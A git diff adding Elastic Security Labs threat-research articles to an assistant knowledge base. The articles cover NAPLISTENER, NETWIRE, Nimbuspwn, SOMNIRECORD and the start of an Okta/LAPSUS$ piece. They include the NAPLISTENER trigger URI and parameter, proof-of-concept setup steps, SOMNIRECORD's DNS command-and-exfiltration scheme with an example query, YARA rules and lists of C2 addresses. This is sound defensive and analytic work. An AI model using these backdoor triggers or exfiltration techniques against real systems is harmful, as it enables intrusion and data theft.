+This unique malware sample contains a C# class called `MsEXGHealthd` that consists of three methods: `Main` , `SetRespHeader` , and `Listener`. This class establishes an HTTP request listener that can process incoming requests from the Internet, and respond accordingly by filtering malware commands and transparently passing along legitimate web traffic. This class is depicted in the following image:
+
+![NAPLISTENER MsEXGHealthd class](/assets/images/naplistener-more-bad-dreams-from-the-developers-of-siestagraph/image3.jpg)
+
+### Malware analysis
+
+The `Main` method is invoked when the program runs and creates a thread object, which will be used by the `Listener` method. The thread is then put to sleep for 0 milliseconds, and then started. Implementing a sleep capability is consistent with SIESTAGRAPH, NAPLISTENER, and other malware developed or used by this group.
+
+The `SetRespHeader` method sets the response headers for the HTTP response. It takes an `HttpListenerResponse` object as a parameter and defines headers such as `Server` , `Content-Type` , and `X-Powered-By`. In one aggressively-targeted victim environment, the IIS web server returns a 404 response with a `Server` header containing `Microsoft-IIS/10.0` as seen below, unless specific parameters are present:
+
+![](/assets/images/naplistener-more-bad-dreams-from-the-developers-of-siestagraph/image6.jpg)
+
+However, the 404 error when requesting the listener URI adds `Content-Type: text/html; charset=utf-8` as an extra header. When NAPLISTENER is installed, the string `Microsoft-HTTPAPI/2.0` is appended to the Server header. This behavior makes the listener detectable and does not generate a 404 error. It is likely this filtering methodology was chosen to avoid discovery by web scanners and similar technologies.
+
+Defenders may instinctively search for these errors in IIS web server logs, but the NAPLISTENER implant functions inline and Windows will redirect these requests to the registered application, allowing the malware to ensure those errors never reach the web server logs where analysts may see them. Additionally, security tools that ingest web server logs will not have an opportunity to identify these behaviors.
+
+![](/assets/images/naplistener-more-bad-dreams-from-the-developers-of-siestagraph/image5.jpg)
+
+The `Listener` method is where most of the work happens for NAPLISTENER.
+
+First, this method creates an `HttpListener` object to handle incoming requests. If `HttpListener` is supported on the platform being used (which it should be), it adds a prefix to the listener and starts it.
+
+Once running, it waits for incoming requests. When a request comes in, it reads any data that was submitted (stored in a `Form` field), decodes it from Base64 format, and creates a new `HttpRequest` object with the decoded data. It creates an `HttpResponse` object and an `HttpContext` object, using these two objects as parameters. If the submitted Form field contains `sdafwe3rwe23` , it will try to create an assembly object and execute it using the `Run` method.
+
+This means that any web request to `/ews/MsExgHealthCheckd/` that contains a base64-encoded .NET assembly in the `sdafwe3rwe23` parameter will be loaded and executed in memory. It's worth noting that the binary runs in a separate process and it is not associated with the running IIS server directly.
+
+If that fails for some reason (e.g., invalid or missing data), then a "404 Not Found" response will be sent with an empty body instead . After either response has been sent, the stream is flushed and the connection closed before looping back to wait for more incoming requests.
+
+### Proof-of-concept prerequisites
+
+_Attention: Please remember that this is meant as a proof-of-concept to illustrate how NAPLISTENER must be prepared for a target environment: it should not be deployed in production environments for any reason._
+
+In order to properly run NAPLISTENER, an SSL certificate must be generated and the application registered to use it on a target endpoint. A general example of generating a self-signed certificate resembles the following commands:
+
+![](/assets/images/naplistener-more-bad-dreams-from-the-developers-of-siestagraph/image7.jpg)
+
+The adversary needs to then Import the `certificate.pfx` object into the windows certificate store, as depicted in the following image:
+
+![](/assets/images/naplistener-more-bad-dreams-from-the-developers-of-siestagraph/image2.jpg)
+
+Each certificate contains a thumbprint, and the following screen capture depicts an example certificate:
+
+![](/assets/images/naplistener-more-bad-dreams-from-the-developers-of-siestagraph/image1.jpg)
+
+The thumbprint value is necessary to register the application as seen in the following command:
+
+![](/assets/images/naplistener-more-bad-dreams-from-the-developers-of-siestagraph/Screenshot_2023-03-19_at_3.14.31_PM.jpg)
+
+The adversary needs to replace the `certhash` value with the thumbprint from their certificate. The `appid` is the GUID of the sample application ID. Once the environment is properly configured, the sample can be run from any privileged terminal.
+
+The following python script created by Elastic Security Labs demonstrates one method that can then be used to trigger NAPLISTENER. The payload in this example is truncated for readability, and may be released at a later time when the industry has better ability to detect this methodology.
+
+![](/assets/images/naplistener-more-bad-dreams-from-the-developers-of-siestagraph/Screenshot_2023-03-19_at_3.15.37_PM.jpg)
+
+In our PoC, running the python script results in a harmless instance of `calc.exe`.
+
+![](/assets/images/naplistener-more-bad-dreams-from-the-developers-of-siestagraph/image4.jpg)
+
+### Resources
+
+Elastic Security Labs has published a NAPLISTENER signature to the open protections artifact repository [here](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_NapListener.yar).
+
+### Sources
+
+Code similarity analyses are an important part of our process. During our investigation of NAPLISTENER, we identified a public [GitHub repository](https://github.com/A-D-Team/SharpMemshell/blob/main/HttpListener/memshell.cs) that contains a similar project. Similar logic and identical debugging strings are present in both pieces of code, and we assess that `SharpMemshell` may have inspired the threat responsible for NAPLISTENER.
+
+### Key takeaways
+
+- The attacker has shifted their focus from data theft to establishing persistent access using new malware including NAPLISTENER, an HTTP listener written in C#
+- NAPLISTENER creates an HTTP request listener that can process incoming requests from the internet, reads any data that was submitted, decodes it from Base64 format, and executes it in memory
+- NAPLISTENER is designed to evade network-based detection methods by behaving similarly to web servers
+- The attacker relies on code present in public repositories for a variety of purposes, and may be developing additional prototypes and production-quality code from open sources
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/netwire_configuration_extractor.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/netwire_configuration_extractor.md
new file mode 100644
index 0000000000000..4cd818bad67d0
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/netwire_configuration_extractor.md
@@ -0,0 +1,69 @@
+---
+title: "NETWIRE Configuration Extractor"
+slug: "netwire-configuration-extractor"
+date: "2023-01-27"
+subtitle: "Configuration extraction tool for the NETWIRE malware."
+description: "Python script to extract the configuration from NETWIRE samples."
+author:
+  - slug: elastic-security-labs
+image: "tools-image.jpg"
+category:
+  - slug: tools
+tags:
+  - netwire
+  - ref9965
+---
+
+Python script to extract the payload from NETWIRE samples.
+
+[Download netwire-configuration-extractor.tar.gz](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltdcef1d05d2077d05/63d43627c31a7126813ff8b6/netwire-configuration-extractor.tar.gz)
+
+> For information on the NETWIRE malware check out the following resources:
+>
+> - [NETWIRE Dynamic Configuration Extraction](https://www.elastic.co/security-labs/netwire-dynamic-configuration-extraction)
+
+## Getting started
+
+### Docker
+
+The recommended and easiest way to get going is to use Docker. From the directory this README is in, you can build a local container.
+
+```
+docker build . -t netwire_loader_config_extractor
+```
+
+Then we run the container with the **-v** flag to map a host directory to the docker container directory.
+
+```
+docker run -ti --rm -v $(pwd)/data:/data netwire_loader_config_extractor:latest --help
+```
+
+### Running it locally
+
+As mentioned above, Docker is the recommended approach to running this project, however you can also run this locally. This project uses [Poetry](https://python-poetry.org/) to manage dependencies, testing, and metadata. If you have Poetry installed already, from this directory, you can simply run the following commands to run the tool. This will setup a virtual environment, install the dependencies, activate the virtual environment, and run the console script.
+
+```
+poetry lock
+poetry install
+poetry shell
+netwire-config-extractor --help
+```
+
+## Usage
+
+All samples need to be unpacked prior to execution extraction attempts.
+
+Our extractor takes either a directory of samples with **-d** option or **-f** for a single sample and then can output parts of the configuration of note, specifically:
+
+- **-k** : extract the encryption keys
+- **-c** : extract the C2 information
+- **-s** : extract the wide-character strings
+- **-a** : extract the ASCII character strings
+
+```
+docker run -ti --rm -v $(pwd)/data:/data netwire_loader_config_extractor:latest -d "C:\tmp\samples"
+```
+
+![NETWIRE configuration extractor](/assets/images/netwire-configuration-extractor/image6.jpg)
+
+You can collect the extracted configurations from the directory you set when running the extractor.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/netwire_dynamic_configuration_extraction.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/netwire_dynamic_configuration_extraction.md
new file mode 100644
index 0000000000000..6b6d95e779b8f
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/netwire_dynamic_configuration_extraction.md
@@ -0,0 +1,248 @@
+---
+title: "NETWIRE Dynamic Configuration Extraction"
+slug: "netwire-dynamic-configuration-extraction"
+date: "2023-01-30"
+subtitle: "A tool for the dynamic extraction of NETWIRE configurations based on emulation."
+description: "Elastic Security Labs discusses the NETWIRE trojan and is releasing a tool to dynamically extract configuration files."
+author:
+  - slug: seth-goodwin
+  - slug: salim-bitam
+image: "lock-code-combination-configuration.jpg"
+category:
+  - slug: security-research
+tags:
+  - netwire
+  - ref9965
+---
+
+## Key takeaways
+
+- NETWIRE has shown an increase in prevalence over the last year
+- Elastic Security Labs created an extractor to pull out configuration data from NETWIRE files and memory dumps targeting the functions the malware uses to extract its encrypted data
+- The NETWIRE extractor is freely available for download
+
+> To download the NETWIRE configuration extractor, check out our post on the tool:
+>
+> - [NETWIRE configuration extractor](https://www.elastic.co/security-labs/netwire-configuration-extractor)
+
+## Preamble
+
+[NETWIRE](https://malpedia.caad.fkie.fraunhofer.de/details/win.netwire) is a Remote Access Tool (RAT) that has been used since at least 2014. It is a publicly available commodity malware and has been observed being used by financially motivated and nation-state actors.
+
+![NETWIRE observations over the past 12-months](/assets/images/netwire-dynamic-configuration-extraction/image1.jpg)
+
+In the second half of 2022, we noticed an uptick in the prevalence of NETWIRE usage in our telemetry data. This prompted the Elastic Security Labs team to develop a configuration extractor to assist the security community in collecting atomic indicators within the configurations. Using this extractor will support threat tracking and improve detection, prevention, and response times.
+
+## Extractor
+
+The NETWIRE RAT uses the [RC4 symmetric encryption](https://en.wikipedia.org/wiki/RC4) algorithm to protect its configuration which is encrypted in the **.data** section along with the 16 bytes long RC4 decryption key.
+
+While reversing our samples the analysts noticed that for both the **crypto::rc4_init_sbox** and **crypto::rc4_decrypt** functions the second argument (#2 in the image below) is always a memory address for the desired encrypted configuration value, and the third argument (#3) is an immediate value written to the memory stack before the call which represents the size of the encrypted string.
+
+It was also noted that the function calls are one after the other. This is important to allow us to structure the extractor to look for these functions sequentially.
+
+![NETWIRE's assembly code for the decryption function](/assets/images/netwire-dynamic-configuration-extraction/image4.png)
+
+With **$key** (from the above image) in mind, we created YARA rules to identify the location of the key and encrypted configuration values.
+
+![YARA rule section that identifies the key and encrypted configuration](/assets/images/netwire-dynamic-configuration-extraction/image5.jpg
+
+With this information we can then use [Capstone](http://www.capstone-engine.org/) to:
+
+1. Locate the function responsible for decrypting the configuration using YARA.
+2. Disassemble the function using Capstone.
+
+3. Extract the RC4 key address and the encrypted configuration field addresses.
+4. Extract the size of the configuration field.
+5. RC4 decrypt the encrypted fields and rebuild the configuration.
+
+![Locating the RC4 key address and the encrypted configuration](/assets/images/netwire-dynamic-configuration-extraction/image2.jpg)
+
+![RC4 decrypting the configuration](/assets/images/netwire-dynamic-configuration-extraction/image5.jpg
+
+Once we have recreated the configuration, we can use the extractor to pull out several parameters used by NETWIRE, as well as a few basic file characteristics:
+
+- **Active Setup Key** : [Active Setup](https://attack.mitre.org/techniques/T1547/014/) registry key to achieve persistence.
+- **C2 IP list** : List of command and control (C2) server domains or IP addresses.
+- **Host ID** : A unique identifier that is assigned to the infected machine.
+- **Installation path** : The location where the malware will be installed.
+- **Keylogger logs directory** : The location where the keylogging log file will be stored.
+- **Mutex** : Mutex name, to create a synchronization object to ensure only one instance of the sample is running on the machine.
+- **Password** : Static password to generate AES key used for encrypting the communication between the malware and the C2 server.
+- **Run registry key entry** : Name of the entry in the [run registry](https://attack.mitre.org/techniques/T1547/001/), used for persistence.
+- **Sleep in seconds** : The amount of time the malware sleeps.
+
+![Sample output from configuration extractor](/assets/images/netwire-dynamic-configuration-extraction/image6.jpg)
+
+The configuration extractor accepts four parameters:
+
+- **-f** : to specify a single NETWIRE sample
+- **-d** : To specify a directory of NETWIRE samples
+- **-o** : To write the configuration in JSON format to the specified file
+- **--all-config** : To print the unparsed raw decrypted configuration
+
+## Analysis
+
+We’ve used this extractor to examine a set of samples from the previous 180 days to extract indicators for further enrichment and analysis.
+
+Our initially collected batch of samples came as a mixture of executable files and memory dumps. The extractor will only work on unmapped files, so the dumps which were already mapped were run through [**pe_unmapper**](https://github.com/hasherezade/pe_unmapper).
+
+When extracting a payload from memory, we are obtaining a memory-mapped version of it. This means that the **"Raw Address"** and **"Raw Size"** may not be correctly aligned with the correct section’s data. To correctly align the PE file, it is necessary to adjust the pointer to the raw address so that it matches the virtual address for every section.
+
+Now we can run the configuration extractor with [Poetry](https://python-poetry.org/) against our directory of unmapped binaries:
+
+```
+**poetry lock**
+**poetry install**
+**poetry shell**
+**netwire-config-extractor -d sample-dir/ -o output.ndjson**
+```
+
+This file, **output.ndjson** , can then be uploaded to Kibana for further analysis.
+
+> Check out the [Elastic Container project](https://www.elastic.co/security-labs/the-elastic-container-project) to quick spin up an Elastic Stack and start analyzing structured security-relevant data.
+
+![Extracted NETWIRE configuration data](/assets/images/netwire-dynamic-configuration-extraction/image3.png)
+
+Next time you run into a NETWIRE sample, run it through our configuration extractor to pull out other indicators to help you on your analytic journey or begin remediating quicker.
+
+## Detection
+
+### YARA
+
+These YARA rules can used to detect and identify NETWIRE RAT.
+
+```
+rule Windows_Trojan_Netwire_1 {
+   meta:
+       author = "Elastic Security"
+       os = "Windows"
+       arch = "x86"
+       category_type = "Trojan"
+       family = "Netwire"
+       threat_name = "Windows.Trojan.Netwire"
+   strings:
+       $a = { 0F B6 74 0C 10 89 CF 29 C7 F7 C6 DF 00 00 00 74 09 41 89 F3 88 5C }
+   condition:
+       all of them
+}
+rule Windows_Trojan_Netwire_2 {
+   meta:
+       author = "Elastic Security"
+       os = "Windows"
+       arch = "x86"
+       category_type = "Trojan"
+       family = "Netwire"
+       threat_name = "Windows.Trojan.Netwire"
+   strings:
+       $a1 = "[%.2d/%.2d/%d %.2d:%.2d:%.2d]" fullword
+       $a2 = "\\Login Data"
+       $a3 = "SOFTWARE\\NetWire" fullword
+   condition:
+       2 of them
+}
+rule Windows_Trojan_Netwire_3 {
+   meta:
+       author = "Elastic Security"
+       os = "Windows"
+       arch = "x86"
+       category_type = "Trojan"
+       family = "Netwire"
+       threat_name = "Windows.Trojan.Netwire"
+   strings:
+       $a = { C9 0F 44 C8 D0 EB 8A 44 24 12 0F B7 C9 75 D1 32 C0 B3 01 8B CE 88 44 }
+   condition:
+       all of them
+}
+rule Windows_Trojan_Netwire_4 {
+   meta:
+       author = "Elastic Security"
+       os = "Windows"
+       arch = "x86"
+       category_type = "Trojan"
+       family = "Netwire"
+       threat_name = "Windows.Trojan.Netwire"
+   strings:
+       $a1 = "http://%s%ComSpec" ascii fullword
+       $a2 = "%c%.8x%s" ascii fullword
+       $a3 = "%6\\6Z65dlNh\\YlS.dfd" ascii fullword
+       $a4 = "GET %s HTTP/1.1" ascii fullword
+       $a5 = "R-W65: %6:%S" ascii fullword
+       $a6 = "PTLLjPq %6:%S -qq9/G.y" ascii fullword
+   condition:
+       4 of them
+}
+```
+
+## Indicators
+
+All indicators are also available [for download](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blte3d9f2700cdf6637/63d3f854e4e29e75dc5de351/9965-indicators.zip) in both ECS and STIX format in a combined zip bundle.
+
+The following indicators were discussed in this research.
+
+| Indicator                              | Type        | Note           |
+| -------------------------------------- | ----------- | -------------- |
+| 139.28.38[.]235                        | ipv4-addr   | NETWIRE RAT C2 |
+| 149.102.132[.]253                      | ipv4-addr   | NETWIRE RAT C2 |
+| 184.75.221[.]115                       | ipv4-addr   | NETWIRE RAT C2 |
+| 185.136.165[.]182                      | ipv4-addr   | NETWIRE RAT C2 |
+| 185.140.53[.]139                       | ipv4-addr   | NETWIRE RAT C2 |
+| 185.140.53[.]144                       | ipv4-addr   | NETWIRE RAT C2 |
+| 185.140.53[.]154                       | ipv4-addr   | NETWIRE RAT C2 |
+| 185.140.53[.]61                        | ipv4-addr   | NETWIRE RAT C2 |
+| 185.216.71[.]251                       | ipv4-addr   | NETWIRE RAT C2 |
+| 194.36.111[.]59                        | ipv4-addr   | NETWIRE RAT C2 |
+| 194.5.98[.]126                         | ipv4-addr   | NETWIRE RAT C2 |
+| 194.5.98[.]178                         | ipv4-addr   | NETWIRE RAT C2 |
+| 194.5.98[.]188                         | ipv4-addr   | NETWIRE RAT C2 |
+| 194.5.98[.]65                          | ipv4-addr   | NETWIRE RAT C2 |
+| 212.193.29[.]37                        | ipv4-addr   | NETWIRE RAT C2 |
+| 212.193.30[.]230                       | ipv4-addr   | NETWIRE RAT C2 |
+| 213.152.161[.]249                      | ipv4-addr   | NETWIRE RAT C2 |
+| 217.151.98[.]163                       | ipv4-addr   | NETWIRE RAT C2 |
+| 23.105.131[.]166                       | ipv4-addr   | NETWIRE RAT C2 |
+| 37.0.14[.]199                          | ipv4-addr   | NETWIRE RAT C2 |
+| 37.0.14[.]203                          | ipv4-addr   | NETWIRE RAT C2 |
+| 37.0.14[.]206                          | ipv4-addr   | NETWIRE RAT C2 |
+| 37.0.14[.]208                          | ipv4-addr   | NETWIRE RAT C2 |
+| 37.0.14[.]214                          | ipv4-addr   | NETWIRE RAT C2 |
+| 37.120.217[.]243                       | ipv4-addr   | NETWIRE RAT C2 |
+| 51.161.104[.]138                       | ipv4-addr   | NETWIRE RAT C2 |
+| 54.145.6[.]146                         | ipv4-addr   | NETWIRE RAT C2 |
+| 80.66.64[.]136                         | ipv4-addr   | NETWIRE RAT C2 |
+| 85.209.134[.]105                       | ipv4-addr   | NETWIRE RAT C2 |
+| 85.31.46[.]78                          | ipv4-addr   | NETWIRE RAT C2 |
+| 94.156.35[.]40                         | ipv4-addr   | NETWIRE RAT C2 |
+| 20220627.duckdns[.]org                 | domain-name | NETWIRE RAT C2 |
+| admin96.hopto[.]org                    | domain-name | NETWIRE RAT C2 |
+| alice2019.myftp[.]biz                  | domain-name | NETWIRE RAT C2 |
+| asorock1111.ddns[.]net                 | domain-name | NETWIRE RAT C2 |
+| banqueislamik.ddrive[.]online          | domain-name | NETWIRE RAT C2 |
+| betterday.duckdns[.]org                | domain-name | NETWIRE RAT C2 |
+| bigman2021.duckdns[.]org               | domain-name | NETWIRE RAT C2 |
+| blazeblaze.ddns[.]net                  | domain-name | NETWIRE RAT C2 |
+| chongmei33.myddns[.]rocks              | domain-name | NETWIRE RAT C2 |
+| clients.enigmasolutions[.]xyz          | domain-name | NETWIRE RAT C2 |
+| gracedynu.gleeze[.]com                 | domain-name | NETWIRE RAT C2 |
+| ingobea.hopto[.]org                    | domain-name | NETWIRE RAT C2 |
+| iphanyi.edns[.]biz                     | domain-name | NETWIRE RAT C2 |
+| iphy.strangled[.]net                   | domain-name | NETWIRE RAT C2 |
+| kimlee11.duckdns[.]org                 | domain-name | NETWIRE RAT C2 |
+| loffgghh.duckdns[.]org                 | domain-name | NETWIRE RAT C2 |
+| megaton.gleeze[.]com                   | domain-name | NETWIRE RAT C2 |
+| moran101.duckdns[.]org                 | domain-name | NETWIRE RAT C2 |
+| netuwaya.servecounterstrike[.]com      | domain-name | NETWIRE RAT C2 |
+| nowancenorly.ddns[.]net                | domain-name | NETWIRE RAT C2 |
+| podzeye.duckdns[.]org                  | domain-name | NETWIRE RAT C2 |
+| podzeye2.duckdns[.]org                 | domain-name | NETWIRE RAT C2 |
+| recoveryonpoint.duckdns[.]org          | domain-name | NETWIRE RAT C2 |
+| redlinea[.]top                         | domain-name | NETWIRE RAT C2 |
+| roller.duckdns[.]org                   | domain-name | NETWIRE RAT C2 |
+| rozayleekimishere.duckdns[.]org        | domain-name | NETWIRE RAT C2 |
+| sani990.duckdns[.]org                  | domain-name | NETWIRE RAT C2 |
+| saturdaylivecheckthisout.duckdns[.]org | domain-name | NETWIRE RAT C2 |
+| uhie.hopto[.]org                       | domain-name | NETWIRE RAT C2 |
+| uhie2020.duckdns[.]org                 | domain-name | NETWIRE RAT C2 |
+| wcbradley.duckdns[.]org                | domain-name | NETWIRE RAT C2 |
+| xman2.duckdns[.]org                    | domain-name | NETWIRE RAT C2 |
+| zonedx.ddns[.]net                      | domain-name | NETWIRE RAT C2 |
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/nimbuspwn_leveraging_vulnerabilities_to_exploit_linux_via_privilege_escalation.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/nimbuspwn_leveraging_vulnerabilities_to_exploit_linux_via_privilege_escalation.md
new file mode 100644
index 0000000000000..ec560b1a286d6
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/nimbuspwn_leveraging_vulnerabilities_to_exploit_linux_via_privilege_escalation.md
@@ -0,0 +1,51 @@
+---
+title: "Nimbuspwn: Leveraging vulnerabilities to exploit Linux via Privilege Escalation"
+slug: "nimbuspwn-leveraging-vulnerabilities-to-exploit-linux-via-privilege-escalation"
+date: "2022-06-02"
+description: "Microsoft 365 Defender team released a post detailing several identified vulnerabilities. These vulnerabilities allow adversarial groups to escalate privileges on Linux systems, allowing for deployment of payloads, ransomware, or other attacks."
+author:
+  - slug: jake-king
+image: "thumb-report-threat-hunting.png"
+category:
+  - slug: security-research
+---
+
+## Summary
+
+The Microsoft 365 Defender team released a [post](https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/) detailing several identified vulnerabilities. These vulnerabilities allow adversarial groups to easily escalate privileges on Linux systems, allowing for deployment of payloads, ransomware, or other malicious actions. Collectively known as Nimbuspwn, these vulnerabilities include a series of security issues within networkd-dispatcher, specifically directory traversal, symlink race, and [TOCTU](https://en.wikipedia.org/wiki/Time-of-check_to_time-of-use) race conditions.
+
+Details are covered in their [detailed post](https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/), and further information will be available within the two requested CVEs: [CVE-2022-29799](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29799) and [CVE-2022-29800](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29800). At the time of publication these CVE IDs are still reserved.
+
+While this class of vulnerability requires local shell access to exploit, it should be considered important for those that currently leverage networkd-dispatcher within their Linux workload environments. A patch by the creator has been implemented to resolve the issue under the guidance of Microsoft, and should be implemented by those that have systems impacted by this vulnerability.
+
+## Detecting Nimbuspwn activity within Elastic
+
+Our research team at Elastic has focused on building out a series of initial detections that leverage Elastic Security, alongside OSquery.
+
+Firstly, those wishing to understand what systems in their environment may be impacted need to determine systems that have networkd-dispatcher installed:
+
+![OSquery search](/assets/images/nimbuspwn-leveraging-vulnerabilities-to-exploit-linux-via-privilege-escalation/elastic-blog-nimbuspwn.png)
+
+Writing an OSquery search that returns the installed version of Networkd-Dispatcher is relatively trivial, and understanding the systems that may be at risk are returned at a glance. In the screenshot above, we can see an example host listed with a version number of 2.1-2, specific to Ubuntu. The version installed within your environment may be slightly different depending on the distribution. An example query has been provided below.
+
+```
+Select version from deb_packages rpm_packages where name=’networkd-dispatcher’;
+```
+
+We leveraged the initial research paper from Microsoft, determining a specific malicious pattern adversaries may use to exploit this vulnerability:
+
+![EQL Detection Rule to detect suspicious child processes of Networkd-Dispatcher](/assets/images/nimbuspwn-leveraging-vulnerabilities-to-exploit-linux-via-privilege-escalation/elastic-blog-nimbuspwn-2.jpg)
+
+The Elastic Security team wrote an EQL Detection Rule to detect suspicious child processes of Networkd-Dispatcher. Any child-process detected by this rule should be considered highly suspicious given the circumstances, and should be investigated. Further analysis will likely be provided as our security community builds more POCs for this exploit. An example query appears below:
+
+```
+process where event.type == "start" and process.parent.name : "networkd-dispatcher" and not process.name in ("networkctl", "networkd-dispatcher")
+```
+
+Given the nature of this exploit, we expect far greater diversity in POCs over the coming weeks. You can expect updates in the form of further signatures or rules accordingly.
+
+## Defensive recommendations
+
+Organizations impacted by vulnerabilities discovered by the Microsoft team should follow guidance provided by Microsoft in their initial post, and update their instances of networkd-dispatcher. Elastic recommends investigating hosts that are found to be running vulnerable versions of network-dispatcher with the aforementioned detections for any sign of compromise.
+
+Not already using Elastic Security? You can always get started with a [free 14-day trial](https://cloud.elastic.co/registration) of Elastic Cloud.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/not_sleeping_anymore_somnirecords_wakeup_call.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/not_sleeping_anymore_somnirecords_wakeup_call.md
new file mode 100644
index 0000000000000..966d46faf994f
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/not_sleeping_anymore_somnirecords_wakeup_call.md
@@ -0,0 +1,65 @@
+---
+title: "Not sleeping anymore: SOMNIRECORD's wake-up call"
+slug: "not-sleeping-anymore-somnirecords-wakeup-call"
+date: "2023-03-22"
+description: "Elastic Security Labs researchers identified a new malware family written in C++ that we refer to as SOMNIRECORD. This malware functions as a backdoor and communicates with command and control (C2) while masquerading as DNS."
+author:
+  - slug: salim-bitam
+image: "blog-thumb-steel-engine.jpg"
+category:
+  - slug: malware-analysis
+tags:
+  - malware analysis
+  - somnirecord
+  - siestagraph
+  - naplistener
+---
+
+### Introduction
+
+While monitoring the [REF2924 activity group](https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns), Elastic Security Labs researchers identified a new malware family written in C++ that we refer to as SOMNIRECORD. This malware functions as a backdoor and communicates with command and control (C2) while masquerading as DNS, allowing attackers to bypass network security controls such as firewalls and intrusion detection systems. Like [NAPLISTENER](https://www.elastic.co/security-labs/naplistener-more-bad-dreams-from-the-developers-of-siestagraph) and [SIESTAGRAPH](https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry), these factors make it difficult to detect and block using strictly network-based technologies.
+
+### Analysis
+
+Upon execution, SOMNIRECORD first generates a random string of three characters used as a unique identifier for the running malware instance. It then probes a domain name that is hardcoded into the binary (" `dafadfweer.top`") by appending the random three-character string and the string " `-PROBE`" to the domain name. SOMNIRECORD simulates a DNS query to retrieve the number of commands that are queued for the backdoor to execute, each stored in a `TXT` record of the associated domain.
+
+![Dns query with PROBE as subdomain](/assets/images/not-sleeping-anymore-somnirecords-wakeup-call/image2.jpg)
+
+![Pseudocode dnsQuery call](/assets/images/not-sleeping-anymore-somnirecords-wakeup-call/image4.jpg)
+
+After obtaining the number of commands waiting to be executed, the backdoor retrieves each command individually by sending a DNS query for a `TXT` record. The backdoor prepends the previously-generated random string to the " `-CMD`" string before sending the DNS query. This allows the backdoor to receive each command individually and execute them accordingly.
+
+![Dns query with CMD as subdomain](/assets/images/not-sleeping-anymore-somnirecords-wakeup-call/image5.jpg)
+
+### Command handling
+
+The malware's command handling function is a critical component that enables it to execute commands received from the C2 server. This function processes the command and performs the appropriate action based on the command type. In this malware, there are five commands that the malware can execute: `SYS, PSL, sleep, ECM` , and `WS` :
+
+![Pseudocode Command handling function](/assets/images/not-sleeping-anymore-somnirecords-wakeup-call/image1.jpg)
+
+“ `SYS` ” is used to retrieve information about the infected machine. When this command is executed, the SOMNIRECORD payload collects information about the computer name, the number of processors, OEM ID, and processor type. This information can be used to fingerprint/identify specific infected machines.
+
+“ `PSL` ” is used to list all processes currently running on the infected machine by executing the system command “tasklist”.
+
+“ `ECM` ” allows the malware to execute any software already present on the system, such as cmd.exe.
+
+“ `sleep` ” is used to change the beacon interval to the c2 server.
+
+“ `WS` ” is used to deploy an ASPX-based webshell to a specified path. The ASPX is hardcoded into the malware itself.
+
+To communicate command results to its C2 server, SOMNIRECORD employs a unique technique that involves encoding the output of executed commands as hex values, prepending the previously generated random string to the " `-DATA`" string and then appending the hex values. The malware then performs a DNS query to the subdomain, allowing the encoded command output to be transmitted to the C2 server for example: `XXX-DATA-68656c6c6f20776f726c64.dafadfweer.top`
+
+![Dns query with DATA as subdomain](/assets/images/not-sleeping-anymore-somnirecords-wakeup-call/image3.png)
+
+### Resources
+
+Elastic Security Labs has provided a SOMNIRECORD signature in our open protections artifact repository [here](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_SomniRecord.yar).
+
+### Sources
+
+Code similarity analyses play an important role in discovering the sources of malicious code used by adversaries. In an effort to identify the source of SOMNIRECORD, we identified an open source project called [DNS-Persist](https://github.com/chouaibhm/DNS-Persist/) that contained similar logic. Like NAPLISTENER, we believe the attacker was inspired by this project and then added modifications to facilitate success in a specific target environment.
+
+### Key takeaways
+
+- The use of open source projects by the attacker indicates that they are taking steps to customize existing tools for their specific needs and may be attempting to counter attribution attempts
+- SOMNIRECORD uses DNS to pattern communication with its command and control (C2), which enables attackers to bypass network egress controls and monitoring
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/okta_and_lapsus_what_you_need_to_know.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/okta_and_lapsus_what_you_need_to_know.md
new file mode 100644
index 0000000000000..8d6c9367a7c38
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/okta_and_lapsus_what_you_need_to_know.md
@@ -0,0 +1,114 @@
+---
+title: "Okta and LAPSUS$: What you need to know"
+slug: "okta-and-lapsus-what-you-need-to-know"
+date: "2022-06-02"
+description: "The latest organization under the microscope of the LAPSUS$ group is Okta. Threat hunt for the recent breach targeting Okta users using these simple steps in Elastic"
+author:
+  - slug: jake-king
+image: "blog-security-detection-720x420.png"
+category:
+  - slug: activity-group
+---
+
+> Readers Note:
+>
+> Elastic has undergone a series of investigations internally and has not yet identified malicious actions that may pertain to this event. Okta has also released two statements relating to the incident in question that may be reviewed [<u>here</u>](https://www.okta.com/blog/2022/03/updated-okta-statement-on-lapsus/) and [<u>here</u>](https://www.okta.com/blog/2022/03/okta-official-statement-on-lapsus-claims/).
+
+## The LAPSUS$ group
+
+Financially motivated adversary groups executing ransomware attacks have rightfully gotten our attention in recent years. Similar to Lulzec, there’s a new group catching attention with different motivations, targeting larger organizations.
+
